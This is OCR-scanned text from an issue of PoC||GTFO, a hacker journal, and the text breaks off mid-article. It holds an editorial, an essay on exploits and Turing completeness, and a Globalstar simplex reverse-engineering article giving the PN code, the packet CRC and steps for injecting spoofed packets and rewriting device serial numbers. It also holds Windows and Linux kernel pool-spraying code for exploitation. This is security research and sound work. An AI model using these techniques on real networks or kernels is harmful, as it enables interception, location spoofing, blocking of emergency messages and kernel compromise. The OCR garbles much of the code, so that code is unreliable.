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1 Please stand; now, please be seated. 


Neighbors, please join me in reading this tenth 
release of the International Journal of Proof of Con- 
cept or Get the Fuck Out, a friendly little collection 
of articles for ladies and gentlemen of distinguished 
ability and taste in the field of software exploitation 
and the worship of weird machines. This is our tenth 
release, given on paper to the fine neighbors of Novi 
Sad, Serbia and Stockholm, Sweden. 

If you are missing the first nine issues, we the 
editors suggest pirating them from the usual loca- 
tions, or on paper from a neighbor who picked up a 
copy of the first in Vegas, the second in бао Paulo, 
the third in Hamburg, the fourth in Heidelberg, the 
fifth in Montréal, the sixth in Las Vegas, the seventh 
from his parents' inkjet printer during the Thanks- 
giving holiday, the eighth in Heidelberg, or the ninth 
in Montréal. 

Page 4 contains our very own Pastor Manul 
Laphroaig's sermon on Newton and Turing, in which 
we learn about the academics' affection for Turing- 
completeness and why they should be allowed to 
marry it. 

On page 7, Colby Moore provides all the details 
you'll need to sniff simplex packets from the Glob- 
alstar satellite constellation. 

Page 12 introduces some tips by Peter Hlavaty of 
the Keen Team on kernel pool spraying in Windows 
and Linux. 

Page 19 presents the results of the second Under- 
handed Crypto Contest, held at the Crypto Village 
of Defcon 23. 
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On page 21, Sophia D’Antoine introduces some 
tricks for communicating between virtual machines 
co-located on the same physical host. In particular, 
the mfence instruction can be used to force strict or- 
dering, interfering with CPU instruction pipelining 
in another VM. 

Eric Davisson, on page 26, presents a nifty lit- 
tle trick for causing quarantined malware to be re- 
detected by McAfee Enterprise VirusScan! This par- 
ticular tumor is benign, but we bet a neighborly 
reader can write a malignant variant. 

Ron Fabela of Binary Brew Works, on page 28, 
presents his recipe for TCP/IPA, a neighborly beer 
with which to warm our hearts and our spirits dur- 
ing the coming apocalypse. 

Our centerfold in this issue is the schematic dia- 
gram to an Electronika BK 0010-01 computer from 
the USSR. You wouldn't believe how difficult it is 
to google the proper way to render a centerfold in 
ETEX! 

Vogelfrei shares with us some tricks for APRS 
and AX.25 networking on page 34. APRS exists 
around much of the western world, and all sorts of 
mischief can be had through it. (But please don't 
be a jerk.) 

Much as some readers think of us as a secu- 
rity magazine, we are first and foremost a systems- 
internals journal with a bias toward the strange and 
the classic designs. Page 40 contains a reprint, in 
the original Serbian, of Моја Antonić' article on the 
Galaksija, his Z80 home computer design, the very 
first in Yugoslavia. 

Íbz is a damned fine neighbor of ours, both a 
mathematician and a musician. On page 60 you'll 
find her latest single, Root Rights are а Grrl's Best 
Friend! If you'd rather listen to it than just read 
the lyrics, run vlc pocorgtfo09.pdf and jump to 
page 61, where Philippe Teuwen describes how he 
made this fine document a polyglot of PDF, ZIP, 
and WavPack. 

On page 62, you will find Oona's Puzzle Corner, 
with all sorts of nifty games for a child of five. If 
you aren't clever enough to solve them, then ask for 
help from a child of five! 

On page 64, the last and most important 
page, we pass around the collection plate. Pastor 
Laphroaig doesn't need a touring jumbo jet like 
those television and radio preachers; rather, this 
humble worshiper of the weird machines needs a 
Turing jumbo jet with which to storm Heaven! 





"Academics should just marry Turing Completeness already!" 


—the grugq 


2 From Newton to Turing, a Happy Family 


When engineers first gifted humanity with horse- 
less carriages that moved on rails under their own 
power, this invention, for all its usefulness, turned 
out to have a big problem: occasional humans and 
animals on the rails. This problem motivated many 
inventors to look for solutions that would be both 
usable and effective. 
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Unfortunately, none worked. The reason for 
this is not so easy to explain—at least Aristotelian 
physics had no explanation, and few scientists till 
Galileo's time were interested in one. On the one 
hand, motion had to brought on by some force and 
tended to kinda barrel about once it got going; on 
the other hand, it also tended to dissipate eventu- 
ally. It took about 500 years from doubting the 
Aristotelian idea that motion ceased as soon as its 
impelling force ceased to the first clear pronounce- 
ment that motion in absence of external forces was 
a persistent rather than a temporary virtue; and an- 
other 600 for the first correct formulation of exactly 
what quantities of motion were conserved. Even so, 
it took another century before the mechanical con- 
servation laws and the actual names and formulas 
for momentum and energy were written down as we 
know them. 
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These days, “conservation of energy” is supposed 
to be one of those word combinations to check off 
on multiple-choice tests that make one eligible for 
college.! Yet we should remember that the steam 
engine was invented well before these laws of clas- 
sical mechanics were made comprehensible or even 
understood at all. Moreover, it took some further 
40—90 years after Watt's ten-horsepower steam en- 
gine patent to formulate the principles of thermody- 
namics that actually make a steam engine work—by 
which time it was chugging along at 10,000 horse- 
power, able to move not just massive amounts of 
machinery but even the engine's own weight along 
the rails, plus a lot more. 

АП of this is to say that if you hear scientists 
doubting how an engineer can accomplish things 
without their collective guidance, they have a lot 
of history to catch up with, starting with that thing 
called the Industrial Revolution. On the other hand, 
if you see engineers trying to build a thing that just 
doesn't seem to work, you just might be able to point 
them to some formulas that suggest their energies 
are best applied elsewhere. Distinguishing between 
these two situations is known as magic, wisdom, ex- 
treme luck, or divine revelation; whoever claims to 
be able to do so unerringly is at best a priest,? not 
a scientist. 

















! Whether one actually understands them or not—and, if you value your sanity, do not try to find if your physics teachers 


actually understand them either. You have been warned. 





ŽNot that stationary steam engines were weaklings either: driving ironworks and mining pumps takes a lot of horses. 
?'T ypically, of a religion that involves central planning and state-run science. This time they'll get it right, never fear! 


There is an old joke that whatever activity needs 
to add “science” to its name is not too sure it is one. 
Some computer scientists may not take too kindly 
to this joke, and point out that it's actually the 
word “computer” that’s misleading, as their science 
transcends particular silicon-and-copper designs. It 
is undeniable, though, that hacking as we know it 
would not exist without actual physical computers. 


As scientists, we like exhaustive arguments: ei- 
ther by full search of all finite combinatorial pos- 
sibilities or by tricks such as induction that look 
convincing enough as a means of exhausting infinite 
combinations. We value above all being able to say 
that а condition never takes place, or always holds. 
We dislike the possibility that there can be a situa- 
tion or a solution we can overlook but someone may 
find through luck or cleverness; we want a yes to 
be a yes and a no to mean no way in Hell. But ei- 
ther full search or induction only apply in the world 
of ideal models—call them combinatorial, logical, or 
mathematical—that exclude any kinds of unknown 
unknowns. 


Hence we have many models of computation: 
substituting strings into other strings (Markov algo- 
rithms), rewriting formulas (lambda calculus), au- 
tomata with finite and infinite numbers of states, 
and so on. The point is always to enumerate all fi- 
nite possibilities or to convince ourselves that even 
an infinite number of them does not harbor the ones 
we wish to avoid. The idea is roughly the same as 
using algebra: we use formulas we trust to reason 
about any and all possible values at once, but to do 
so we must reduce reality to a set of formulas. These 
formulas come from a process that must prod and 
probe reality; we have no way of coming up with 
them without prodding, probing, and otherwise ex- 
perimenting by hunch and blind groping—that is, by 
building things before we fully understand how they 
work. Without these, there can be no formulas, or 
they won't be meaningful. 

5o here we go. Exploits establish the variable 
space; “science” searches it, to our satisfaction or 
otherwise, or—importantly to save us effort—asserts 
that a full and exhaustive search is infeasible. This 
may be the case of energy conservation vs. trying 
to construct a safer fender—or, perhaps, the case 
of us still trying to formulate what makes sense to 





attempt. 


That which we call the “arms race" is a part of 
this process. With it, we continually update the 
variable spaces that we wish to exhaust; without it, 
none of our methods and formulas mean much. This 
brings us to the recent argument about exploits and 
Turing completeness. 


FENDER DROPOSED BY THE 
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Knowledge is power.^ In case of the steam еп- 
gine, the power emerged before the kind of knowl- 
edge called “scientific” (if one is in college) or “basic” 
(if one is a politician looking to hitch a ride—because 
actual science has a tradition of overturning its own 
^basics" as taught in schools for at least decades if 
not centuries). In any case, the knowledge of how 
to build these engines was there before the knowl- 
edge that actually explained how they worked, and 
would hardly have emerged if these things had not 
been built already. 
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“The question of whether that which is not power is still knowledge is best left to philosophers. One can blame Nasir al-Din 
al- Tusi for explaining the value of Astrology to Khan Hulagu by dumping a cauldron down the side of a mountain to wake up 
the Khan's troops and then explaining that those who knew the causes above remained calm while those who didn't whirled in 
confusion below—but one can hardly deny that being able to convince a Khan was, in fact, power. Not to mention his horde. 
Because а Khan, by definition, has a very convincing comeback for “Yeah? You and what horde?" 


Our very own situation, neighbors, is not unlike 
that of the steam power before the laws of ther- 
modynamics. There are things that work (pump 
mines, drive factories), and there are official ways of 
explaining them that don't quite work. Eventually, 
they will merge, and the explanations will catch up, 
and will then become useful for making things that 
work better—but they haven't quite yet, and it is 
frustrating. 
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This frustration is understandable. As soon 
as academics rediscovered a truly nifty kind of 
exploit programming, they not just focused on 
the least practically relevant aspect of it (Tur- 
ing completeness)—but did so to the exclusion of 
all other kinds of niftyness such as information 
leaks, probabilistic programming (heap feng-shui 
and spraying), parallelism (cloning and pinning of 
threads to sap randomization), and so on. That 
focus on the irrelevant to the detriment of the rele- 
vant had really rankled. It was hard to miss where 
the next frontier of exploitation’s hard programming 
tasks and its next set of challenges lay, but oh boy, 








did the academia do it again. 

Yet it is also clear why they did it. Academic 
CS operates by models and exhaustive searches or 
reasoning. Its primary method and deliverable is 
exhaustive analysis of models, i.e., the promise that 
certain bad things never happen, that all possible 
trajectories of a system have been or can be enu- 
merated. 

Academia first saw exploit programming when 
it was presented to it in the form of a model; prior 
to that, their eyes would just slide off it, because it 
looked “ad-hoc”, and one can neither reason about 
“ad-hoc” nor enumerate it (at least, if one wants 
to meet publication goals). When it turned out it 
had a model, academia did with it what it normally 
does with models: automating, tweaking, searching, 
finding their theoretical limits, and relating them to 
other models, one paper at a time.’ 

This is not a bad method; at least, it gave us 
complex compilers and CPUs that don’t crumble 
under the weight of their bugs. Eventually we will 
want the kind of assurances this method creates— 
when their models of unexpected execution are com- 
plete enough and close enough to reality. For now, 
they are not, and we have to go on building our en- 
gines without guidance from models, but rather to 
make sure new models will come from them. 

Not that we are without hope. One only has 
to look to Grsecurity/PaX at any given time to 
see what will eventually become the precise stuff of 
Newton's laws for the better OS kernels; similarly, 
the inescapable failure modes of data and program- 
ming complexity will eventually be understood as 
clearly as the three principles of thermodynamics. 
Until then our best bet is to build engines—however 
unscientific—and to construct theories—however re- 
moved from real power—and to hope that the en- 
gineering and the science will take enough notice of 
each other to converge within a lifetime, as they have 
had the sense to do during the so-called Industrial 
Revolution, and a few lucky times since. 

And to this, neighbors, the Pastor raises not one 
but two drinks—one for the engineering orienting the 
science, and one for the science catching up with the 
knowledge that is power, and saving it the effort of 
what cannot be done—and may they ever converge! 
Amen. 








? And some of these papers were true Phrack-like gems that, true to the old-timey tradition, explained and exposed surprising 
depths of common mechanisms: see, for example, SROP and СООР. 
“While, for example, products of the modern web development “revolution” already do, despite being much less complex 


than a CPU. 


3 Breaking Globalstar Satellite Communications 


by Colby Moore 


It might be an understatement to say that hackers have a fascination with satellites. Fortunately, with 
advancements in Software Defined Radio such as the Ettus Research USRP and Michael Ossmann’s HackRF, 
satellite hacking is now not only feasible, but affordable. Here we'll discuss the reverse engineering of 
Globalstar's Simplex Data Service, allowing for interception of communications and injection of data back 
into the network. 

Rumor has it, that after deployment, Globalstar's first generation of satellites began to fail, possibly due 
to poor radiation hardening. This affected the return path data link, where Globalstar would transmit to a 
user. To salvage the damaged satellite network, Globalstar introduced a line of simplex products that enable 
short, one-way communication from the user to Globalstar. 

The nature of the service makes it ideal for asset tracking and remote sensor monitoring. While extremely 
popular with oil and gas, military, and shipping industries, this technology is also widely used by consumers. 
A company called SPOT produces consumer-grade asset trackers and personal locator beacons that utilize 
this same technology. 

Globalstar touts their simplex service as “extremely difficult" to intercept, noting that the signal's “Low- 
Probability-of-Intercept (LPI) and Low- Probability-of-Detection(LPD) provide over-the-air security.” ” 

In this article ГП outline the basics for reverse engineering the Globalstar Simplex Data Services mod- 
ulation scheme and protocol, and will provide the technical information necessary to interface with the 
network. 











31 Network Architecture 


The network is comprised of many Low Earth Orbit, bent-pipe satellites. Data is transmitted from the user 
to the satellite on an uplink frequency and repeated back to Earth on a downlink frequency. Globalstar 
ground stations all over the world listen for this downlink data, interpret it, and expose it to the user via an 
Internet-facing back-end. Each ground station provides a several thousand mile window of data coverage. 

Bent-pipe satellites are “dumb” in that they do not modify the transmitted data. This means that the 
data on the uplink is the same on the downlink. Thus, with the right knowledge, a skilled adversary can 
intercept data on either link. 


3.2 Tools and Code 


This research was conducted using GNURadio and Python for data processing and an Ettus Research B200 
for RF work. Custom proof-of-concept toolsets were written for DSSS and packet decoding. Devices tested 
include a SPOT Generation 3, a SPOT Trace, and à SmartOne A. 





3.3  Frequencies and Antennas 


Four frequencies are allocated for the simplex data uplink. Current testing has only shown operation on 
channel A. 


Channel | Frequency 








A 1611.25 MHz 
B 1613.75 MHz 
C 1616.25 MHz 
D 1618.78 MHz 


Thttp://productsupport.globalstar.com/2009/02/09/are-simplex-messages-secure/ 


Е WX GUI FFT Sink 
Variable Title: FFT Plot 
ID: samp rate Sample Rate: 5M 
Value: 5M Baseband Freq: 0 
Y per Div: 10 dB 


Ref Level (dB): 0 


Rational Resampler Simple Squelch Ref Scale (p2p): 2 
= Throttle 
File Source Interpolation: 5 Costas Loop Ё | | Threshold (dB): -60 | | || Sample Rate: 5M || FFT Size: 1.024k 
File: ...re-4M-428pm-trace.iq | | | | Decimation: 4 | | | | Loop Bandwidth: 62.8m Alpha: 1 Refresh Rate: 15 










Repeat: No Taps: Order: 2 Freq Set Varname: None 
Fractional BW: 0 


WX GUI Scope Sink 
Title: Scope Plot 


Sample Rate: 5M 
XY Mode: On 
Trigger Mode: Auto 
File Sink Y Axis Label: Counts 


File: ..ted spread out.bytes 


PSK Demod 
Number of Constellation Points: 2 
Differential Encoding: No 
Samples/Symbol: 4 
| | Excess BW: 350m 
Frequency BW: 62.8m 


Титипа BW: 62.8m A 

Phase BW: 62.8m Г Char To Float E B IA "epis ЗЕР 

Сгау Соде: Мо Ѕсаіе: 1 E P ps 
Trigger Mode: Auto 


Unbuffered: Off 
Append file: Overwrite WX GUI Waterfall Sink 
Title: Waterfall Plot 
Sample Rate: 5M 
Baseband Freq: 0 
Dynamic Range: 100 
Reference Level: 0 

Ref Scale (p2p): 2 

FFT Size: 512 

FFT Rate: 15 

Freq Set Varname: None 





WX GUI Scope Sink 






Y Axis Label: Counts 





Globalstar uses left-hand circular-polarized antennas for transmission of simplex data from the user to 
the satellite. The Globalstar GSP-1620 antenna, designed for transmitting from the user to a satellite, has 
proven adequate for experimentation. 

Downlink is a bit more complicated, and far more faint. Channels vary by satellite, but are within the 
6875—7055 MHz range. Both RHCP and LHCP are used for downlink. 


3.4 Direct Sequence Spread Spectrum 


Devices using the simplex data service implement direct sequence spread spectrum (DSSS) modulation to 
reliably transmit data using low power. DSSS is a modulation scheme that works by mixing a slow data signal 
with a very fast Pseudo Noise (PN) sequence. Since the pseudo-random sequence is known, the resulting 
signal retains all of the original data information but spread over a much wider spectrum. Among other 
benefits, this process makes the signal more tolerant to interference. 

In Globalstar's implementation of DSSS, packet data is first modulated as non-differential BPSK at 
100.04 bits/second, then spread using a repeating 255 chip PN sequence at a rate of 1,250,000 chips/second. 
Here “chip” refers to one bit of a PN sequence, so that it is not confused with actual data bits. 








3.5 Pseudo Noise Sequence / M-Sequences 


Pseudo Noise (PN) sequences are periodic binary sequences known by both the transmitter and receiver. 
Without this sequence, data cannot be received. The simplex data service uses a specific type of PN sequence 
called an M-Sequence. 

M-Sequences have the unique property of having a strong autocorrelation for phase shifts of zero but 
very poor correlation for any other phase shift. This makes the detection of the PN in unknown data, and 
subsequently locking on to а 0555 signal, relatively simple. 

АП simplex data network devices examined use the same PN sequence to transmit data. By knowing one 
code, all network data can be intercepted. 


3.6 Obtaining The M-Sequence 





In order to intercept network data, the PN sequence must be recovered. For each bit of data transmitted, 
the PN sequence repeats 49 times. Data packets contain 144 bits. 





1,250,000 chips 1 second 1 РМ sequence 


хх = 49 РМ sequences/bit 
1 second 100.04 bits 255 chips 





The PN sequence never crosses a bit boundary, so it can be inferred that 





xor(PN, data) == РМ 


By decoding the transmitted data stream as BPSK,® we can demodulate a spread bitstream. Note that 
demodulation in this manner negates any processing gain provided from 0555 and thus can only be received 
over short distances, so for long distances you will need to use а proper 0555 implementation. 

Viewing the demodulated bitstream, a repeating sequence is observed. This is the PN, the spreading 
code key to the kingdom. 

The simplex data network PN codeis 1111111100101101011011101010101110010011011010011001101- 
00011101101100010001001111010010010000111100010100111000111110101111001110100001010110010- 
10001011000001100100011000011011111101110000100000100101010010111110000001110011000110101- 
0000000101110111101100. 





3.7  Despreading 


DSSS theory states that to decode а DSSS-modulated signal, a received signal must be mixed once again 
with the modulating PN sequence; the original data signal will then fall out. However, for this to work, the 
PN sequence needs to be phase-aligned with the mixed PN/data signal, otherwise only noise will emerge. 

Alignment of the PN sequence to the data stream if accomplished by correlating the PN sequence against 
the incoming datastream at each sample. When aligned, the correlation will peak. То despread, this 
correlation peak is tracked and the PN is mixed with the sampled RF data. Тће resulting signal is the 
100.04 bit /second non-differential BPSK modulated packet data. 





3.8 Decoding and Locations 


Once the signal is despread, a BPSK demodulator is used to recover data. The result is a binary stream, 
144 bytes in length, representing one data packet. The data packet format is as follows: 





Field Bits | Description 

Preamble (10) | 0000001011 signifies start of packet 

ESN 26) | 3 bits for manufacturer ID and 23 bits for unit ID 
Message 77 4) message number modulo 16, saved in non-volatile memory 
Packet = 4) number of packets in a message 


User Data 72) | 9 bytes of user information, MSB first 
2 


( 
( 
( 
Packet Seq. # | (4) sequence number for each packet in a message 
( 
CRC24 (24) | CRC is 24 bits with polynomial: 114377431 


Simplex data packets can technically transmit any 72 bits of user defined data. However, the network is 
predominantly used for asset tracking and thus many packets contain GPS coordinates being relayed from 
tracking devices. This data scheme for GPS coordinates can be interpreted with the following Python code. 


latitude = int(user data[8:32],2) ж 90 / 2xx23 





longitude = 360 — int(user_data[32:56],2) ж 180 / 2xx23 


80855 theory shows us that DSSS is the same as BPSK for a BPSK data signal. 


3.9 CRC 


Packets are verified using а 24 bit CRC. The data packet minus the preamble and CRC are fed into the CRC 
algorithm in order to verify or generate a CRC. The following Python code implements the CRC algorithm. 


def crc T wentyfour(TX Data): 


k 0 


m О 


TempCRC = 0 
Crc — OxFFFFFF 


for К in range(0,14): #calc checksum on 14 bytes starting with ESN 


Zoffset to skip part of the preamble (dictated by algorithm) 
TempCRC = int(TX Data[ (k«8)48 : (Кж8)+8+8 |, 2) 


If 0 — k: 
#skip 2 preamble bits in byteO 
TempCRC = TempCRC & 0х8ї 


Cre = Cre ^ (TempCRC)<<16 
for m in range(0,8): 

Cre = Cre << 1 

if Cre & 0x1000000: 


#seed CRC 
Cre = Cre ^ 0114377431L 


Cre = (CU Gro) & 0xffffff; 
Zend crc generation. lowest 24 bits of the long hold the СЕС 


Zfirst CRC byte to TX Data 
bytel4 = (Crc & 0x00ff0000) >> 16 


#second CRC byte to TX Data 
bytel5 = (Crc & 0x0000ff00) >> 8 


#third CRC byte to TX Data 
bytel6 = (Cre & 0x000000ff) 


final crc = (bytel4 << 16) | (bytel5 << 8) | bytel6 
if final crc != int(TX Data[120:144], 2): 


print "Error: CRC failed" 
sys.exit (0) 





3.10 Transmitting 


DISCLAIMER: It is most likely illegal to transmit on Globalstar’s frequencies where you live. Do so at your 
own risk. Remember, no one likes late night visits from the FCC and it would really suck if you interrupted 
someone’s emergency communication! 

By knowing the secret PN code, modulation parameters, data format, and CRC, it is possible to craft 
custom data packets and inject them back into the satellite network. The process is as follows: 





e Generate a custom packet 


10 


e Calculate and affix the packet's САС 
e Spread the packet using the Globalstar PN sequence 


e ВРЗК modulate the spread data and transmit on the RF carrier 


Various SDR boards should have enough power to communicate with the network, however COTS am- 
plifiers are available for less than a few hundred dollars. Specifications suggests а transmit power of about 
200 milliwatts. 


3.11 Spoofing 


SPOT produces a series of asset trackers called SPOT Trace. SPOT also provides SPOT. Device. Updater.pkg, 
an OS X update utility, to configure various device settings. This utility contains development code that is 
never called by the consumer application. 

The updater app package contains SPOT3FirmwareTool.jar. Decompilation shows that a UI view calls 
a method writeESN() in SPOTDevice.class. You read that correctly, they included the functionality to 
program arbitrary serial numbers to SPOT devices! 

This UI can be called with a simple Java utility. 


import com. globalstar.SPOTSFirmwareTool.UI. DebugConsole ; 


public class SpotDebugConsole 1 
public static void main(String[|| args) { 


) 


DebugConsole.main( args); 





Upon execution, а debug console is launched, allowing the writing of arbitrary settings including ESNs, to 
the SPOT device. (This functionality was included in Spot Device Updater 1.4 but has since been removed.) 





3.12 Impact 


The simplex data network is implemented in countless places worldwide. Everything from SCADA monitor- 
ing to emergency communications relies on this network. To find that there is no encryption or authentication 
on the services examined is sad. And to see that injection back into the network is possible is even worse. 

Using the specifications outlined here, it is possible—among other things—to intercept communications 
and track assets over time, spoof an asset's location, or even cancel emergency help messages from personal 
locator beacons. 

One could also enhance their own service, create their own simplex data network device, or use the 
network to transmit their own covert communications. 





3.13 PoC and Resources 


This work was presented at BlackHat USA 2015 and proof-of-concept code is available both by Github and 
within this PDF file.? 


%git clone https://github.com/synack/globalstar 
unzip pocorgtfo09.pdf globalstar.tar.bz2 
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4  Unprivileged Data АП Around the Kernels; or, 
Pool Spray the Feature! 


by Peter Hlavaty of Keen Team 


When it comes to kernel exploitation, you might think about successful exploitation of interesting bug 
classes such as use-after-free and over /under-flows. In such exploitation it is sometimes really useful to ensure 
that the corrupted pointer will still point to accessible, and in the best scenario also controllable, data. 

As we described in our recent blogpost!? about kernel security, although controlling kernel data to such 
an extent should be impossible and unimaginable, this is, in fact, not the case with current OS kernels. 

In this article we describe layout and control of pool data for various kernels, in different scenarios, and 
with some nifty examples. 


4.1 Windows 


1. Small and big allocations: There are a number of known approaches to invoking ExAllocatePool 
(kmalloc) in kernel, with more or less control over data shipped to kernel. Two notable examples are 
SetClassLongPtrW!! by Tarjei Mandt and CreateRoundRectRgn/PolyDraw!* by Tavis Ormandy. Another 
option we were working on recently resides in SessionSpace and grants full control of each byte except those 
in the header space. We successfully leveraged this approach in Pwn2Own 2015 and described it this year 
at Весоп.13 

We use the win32k!. gre, bitmap object. 





The CreateBitmap function creates a bitmap with the specified width, height, and color format 
(color planes and bits-per- pixel). 


Syntax 
С++ 
HBITMAP CreateBitmap( 
In. int nWidth, 
In. int nHeight, 
In. UINT cPlanes, 
In UINT cBitsPerPel, 


_In_ const VOID *lpvBits 
); 


You can think of it as a kind of kmalloc. Consider the following code: 





class CBitmapBufObj 
public IPoolBuf 


gdi obj«HBITMAP- m bitmap; 
public: 
size t Alloc(void* mem, size t size) override 1 
m bitmap. reset (CreateBitmap ( 
size, 1, 1, 
RGB х 8, 
nullptr)); 
if (!get()) 
return 0; 
return SetBitmapBits(m bitmap, size, mem); 


IÜnttp://www.k33nteam.org/noks.html 

11http://j00ru.vexillium.org/dump/recon2015.pdf 

!2http://blog.cmpxchg8b.com/2013/05/introduction-to-windows-kernel-security.html 
http://www.slideshare.net/PeterHlavaty/power-of-linked-list 

13This Time Font Hunt You Down in 4 Bytes, Peter Hlavaty and Jihui Lu, Recon 2015 
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void Free() override { 
17 m bitmap.reset(); 





2. Different pools matter: On Windows, exploitation of different objects can get a bit tricky, because 


they can reside in different pools. 


typedef enum POOL TYPE { 
NonPagedPool , 
NonPagedPoolExecute 
PagedPool , 
NonPagedPoolMustSucceed 
DontUseThisType, 
NonPagedPoolCacheAligned 
PagedPoolCacheAligned , 
NonPagedPoolCacheAlignedMustsS 
MaxPoolType, 

YonPagedPoolBase 
YonPagedPoolBaseMustSucceed 
NonPagedPoolBaseCacheAligned 
NonPagedPoolBaseCacheAlignedMustsS 
NonPagedPoolSession 

PagedPoolSession 
NonPagedPoolMustSucceedSession 

Dont UseThisTypeSession 
NonPagedPoolCacheAlignedSession 
PagedPoolCacheAlignedSession 
NonPagedPoolCacheAlignedMustSSession 
NonPagedPoolNx 
NonPagedPoolNxCacheAligned 
NonPagedPoolSessionNx 

} POOL TYPE; 











= 32; 
= NonPagedPoolSession + 1, 

= PagedPoolSession + 1, 

= NonPagedPoolMustSucceedSession + 1, 
= DontUseThisTypeSession + 1, 

= NonPagedPoolCacheAlignedSession + 1, 
= PagedPoolCacheAlignedSession + 1, 

= 512, 

= NonPagedPoolNx + 4, 


NonPagedPool , 
NonPagedPool - 


NonPagedPool - 











NonPagedPool - 


? 


onPagedPoolBase + 2, 


0 
N 

= NonPagedPoolBase + 4, 
N 


onPagedPoolBase + 6, 














NonPagedPoolNx + 32 


This means that if you want to use our win32k!_gre_bitmap technique, you must use it only on objects 
existing in SessionPool, which is not always the case. But on the other hand, as we already discussed, in 
different pools you can find different objects to fulfill your needs. Another nice example, in a different pool, 


was leveraged by Alex Ionescu,!“ 


using the Pipe object (and proposed with the socket object as well): 


CreatePipe function 


Creates an anonymous pipe, and returns handles to the read and write ends of the pipe. 


Syntax 


| С++ 


BOOL WINAPI CreatePipe( 


Dub. PHANDLE 
_Out_ PHANDLE 


hReadPipe, 
hWritePipe, 


In opt LPSECURITY ATTRIBUTES lpPipeAttributes, 


Tn DWORD 
); 





nSize 


The following piece of code represents another kmalloc of chosen size. 





1l class CPipeBufObj 
public IPoolBuf 


CPipe m_ pipe; 


14 Sheep Year Kernel Heap Fengshui: Spraying in the Big Kids’ Pool, Alex Ionescu, Dec 2014 
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public: 
size t Alloc(void* mem,size t size) override{ 

size t n written = 0; 

auto status = WriteFile( 
m pipe.In(), 
mem, size, 
&n written , nullptr); 

if (!NT SUCCESS(status)) 


return 0; 


return n written; 


) 


void Free() override{ 
m pipe.reset(new CPipe) 








This was just a sneak peek at two objects that are easy to misuse for precise control over kernel memory 
content (via SetBitmapBits and WriteFile) and the pool layout (via Alloc and Free). Precise pool layout 
control can be achieved mainly in big pools, where layout can be controlled to a large extent. With small 
allocations, you may face more problems due to randomization being in place, as covered by the nifty research 
[10] of Тагје Mandt and Chris Valasek. 

We mention only a few objects to spray with; however, if you invest a bit of time to look around the 
kernel, you will find other mighty objects in different pools as well. 


4.2 Linux (Android) Kernel 


In Linux, you face a different scenario. With SLUB, you encounter problems due to overall randomiza- 
tion, and due to data that is not so easily controllable. In addition, SLUB has a different concept of 
pool separation—that of separate kernel caches for specific object types. Kernel caches provide far better 
granularity, as often only a few objects are stored in the same cache. 

In order to exploit an overflow, you may need to use a particular object of the same cache, or force the 
overflow from your SLAB_objectA to а new SLAB_objectB block. In case of UAF, you can also force a whole 
particular SLAB block to be freed and reallocate it with another SLAB object. Either of these variants may 
be complex and not very stable. 

However, not all objects are stored in those kernel caches, and a lot of the useful ones are allocated from 
the default object pool based only on the size of the object, so in the same SLAB you can mix different 
objects. 

Our first useful object for playing with the pool layout is Pipe: 





class CPipeObject 
public IPoolObj 


std::unique ptr<CPipe> m pipe; 


operator CPipex()1 
return т pipe. get () ; 
} 


CPipeObject () 
m_pipe(nullptr) { 
} 


bool Alloc() override { 
m pipe. reset (new CPipe() ) ; 


if (!m pipe. get ()) 
return false; 
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if (!m_pipe—>IsReady () ) 
return false; 


// Let's cover same SLAB, pipe, and its buffer! 
// fentl(m_pipe—>In(), Е SETPIPE SZ, PAGE SIZE ж 2); 
return true; 


) 


void Free() override{ 





m pipe.release(); 





Another object to look at is TTY: 


class CTtyObject 
public IPoolObj 
{ 
CScopedFD m fd; 
public: 


operator int(){ 
return m fd; 
) 


CTtyObject () 
m fd(—1) 
{ 


) 


bool Alloc() override( 
m fd.reset(open("/dev/ptmx" , О RDWR | О NONBLOCK) ) ; 
return (—1 !— m fd); 


) 


void Free() override{ 
m fd.reset(); 





Another one that comes to mind is Socket: 





class CSocketObject 


public IPoolObj 


1 
CScopedFD m sock; 
public: 
operator int(){ 
return m sock; 


) 

CSocketObject () 
m зоск(—1) 

| 

} 


bool Alloc() override { 
m sock. reset (socket (АЕ INET, SOCK DGRAM, IPPROTO_ICMP) ) ; 
return (—1 != m sock. get ()); 


} 


void Free() override{ 
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т sock. reset () ; 





However, in our implementations we only play with allocations of sizes sizeof (Pipe), sizeof (TTY), 
sizeof (Socket), but not with their associated buffers for the Pipe, ТТУ, or Socket objects respectively. 
Therefore, here we omit doing the equivalent of memcpy, but you can ship your controlled data to kernel 
memory through the write syscall, which will store it there faithfully byte-for-byte. 

Here is an example with Pipe. It is similar to the Windows example. In Windows we use the WriteF ile 
API, but in the Linux implementation we have to use CPipe. Write, like in this example with fcnt1 syscall: 








class CPipeBufObj 
public IPoolBuf 
| 
CPipe m pipe; 
public: 
size t Alloc(void* mem,size t size) override { 
auto shift = KmallocIndexByPipe(size); 
if (!shift) 
return nullptr; 
if (—1 == fcntl(pipe.In(), Е SETPIPE SZ, PAGE SIZE ж shift)) 
return nullptr; 
if (!pipe—>Write(mem, size)) 
return nullptr; 
return size; 


) 


void Free() override { 
m bitmap. reset (); 





One of the reasons why we focus mainly on object 
header-based kmallocs is that in Linux the objects we 
deal with are easy to overwrite, have a lot of pointers 
and useful state we can manipulate, and are often guite 
large. For example, they may cover different SLABSs, 
and may even be located in the same SLAB аз various 
kinds of buffers that make pretty sexy targets. One 
more reason is covered later in this article. 

However, pool layout is a far more difficult task than 
described above, as randomization complicates it to a 
large extent. You can usually overcome it with spray- 
ing in the same cache and filling most of the pool to 
ensure that almost every object there can be used for 
exploitation (as due to randomization you don't know 
where your target will reside). 
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SLAB - latest 


Kernel Address space 


0xee07... 
Oxffff... 


L] Victim - buffer overflowing 


L] Target - overflowed to 


[] Target - decoy 


Sometimes by trying to do this kind of pool layout with overflowable buffer and right object headers you 
can achieve full pwn even without touching addr_limit. 
Pool spray brute force implementation: 


template<typename t PoolObjType, bool FIFO> 
size t 
Spray ( 
size t objLimit 


) 


for (size t n obj id = 0; n obj id < objLimit; n obj id++){ 
std::unique ptr-cIPoolObj» pool obj(new t PoolObjType()); 
if (!pool obj)//not enough memory on heap 2 
break ; 
if (!pool obj—>Alloc())//not enough memory on pool ? 
break ; 
if (FIFO) 
BILIST : : push Баск (жѕбабіс _ сазф <& PoolObjTypex»(pool obj.release())); 
else 
BILIST :: push front(*static _cast<t PoolObjTypex»(pool obj.release())); 


return BILIST :: size(); 








But as we mentioned before, a big drawback to effective pool spraying on Linux and to doing a massive 
controllable pool layout is the limit on the number of owned kernel objects per process. You can create a 
lot of processes to overcome it, but that is bit messy, does not always properly solve your issue, or is not 
possible anyway. 

Spray by GFP_ USER zone: 

